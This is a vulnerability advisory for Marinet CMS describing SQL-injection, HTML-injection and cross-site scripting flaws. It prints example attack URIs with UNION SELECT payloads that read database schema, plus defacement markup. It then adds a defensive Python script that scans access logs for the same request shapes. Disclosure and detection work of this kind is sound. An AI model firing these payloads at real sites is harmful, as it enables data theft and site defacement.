Marinet CMS Multiple Input Validation Vulnerabilities
BID:40080
Info
| Bugtraq ID: | 40080 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2010 12:00AM |
| Updated: | May 11 2010 12:00AM |
| Credit: | CoBRa_21 and Ashiyane Digital Security Team |
| Vulnerable: | MARINET Marinet CMS 0 |
| Not Vulnerable: | |
Discussion
Marinet CMS is prone to multiple input-validation vulnerabilities, including multiple SQL-injection, HTML-injection, and cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URIs are available:
http://www.example.com/product.php?id=-1%20union%20select%200,1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%28column_name%29,23,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/productuk.php?id=-1%20union%20select%200,1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat%28column_name%29,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/galleryphoto.php?id=1&photo=<font size=15 color=red>Hacked By CoBRa_21</font>
http://www.example.com/info.php?catid=1&cat=<font size=15 color=red>Hacked By CoBRa_21</font>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
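In the absence of a vendor patch, web server access logs can be checked for requests of the shapes listed under Exploit / POC. The following is an added example, not part of the original advisory or of Marinet CMS: it assumes combined-format access logs and that the `id` parameters of product.php and productuk.php are plain positive integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts and parameters taken from the advisory's example URIs.
# Assumption: the id parameters are positive integers in normal use.
NUMERIC_PARAMS = {"product.php": {"id"}, "productuk.php": {"id"}}
TEXT_PARAMS = {"galleryphoto.php": {"photo"}, "info.php": {"cat"}}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")  # start of an HTML tag or comment

# Constructed sample log lines (documentation IP range, shortened payloads).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/May/2010:10:00:00 +0000] "GET /product.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/May/2010:10:00:07 +0000] "GET /product.php?id=-1%20union%20select%200,1,version%28%29 HTTP/1.1" 200 4870',
    '203.0.113.9 - - [11/May/2010:10:00:19 +0000] "GET /info.php?catid=1&cat=%3Cfont%20size=15%3Ex%3C/font%3E HTTP/1.1" 200 3300',
    '203.0.113.7 - - [11/May/2010:10:01:02 +0000] "GET /galleryphoto.php?id=1&photo=harbour HTTP/1.1" 200 2900',
]


def inspect_uri(uri):
    """Return a list of (param, reason) findings for one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes names and values, so %20 and %28 forms
    # are compared in their decoded shape.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS.get(script, ()) and not re.fullmatch(r"\d+", value):
            findings.append((name, "non-numeric value in numeric parameter"))
        if name in TEXT_PARAMS.get(script, ()) and MARKUP_RE.search(value):
            findings.append((name, "HTML markup in reflected parameter"))
    return findings


def scan_log(lines):
    """Yield (line_number, uri, findings) for log lines that trip a check."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = inspect_uri(match.group(1))
            if findings:
                yield number, match.group(1), findings


if __name__ == "__main__":
    for number, uri, findings in scan_log(SAMPLE_LOG):
        print(number, uri, findings)
```

The same two checks (integer-only `id`, no markup in `photo` and `cat`) can be enforced as request filtering in front of the application until the code itself validates and encodes these parameters.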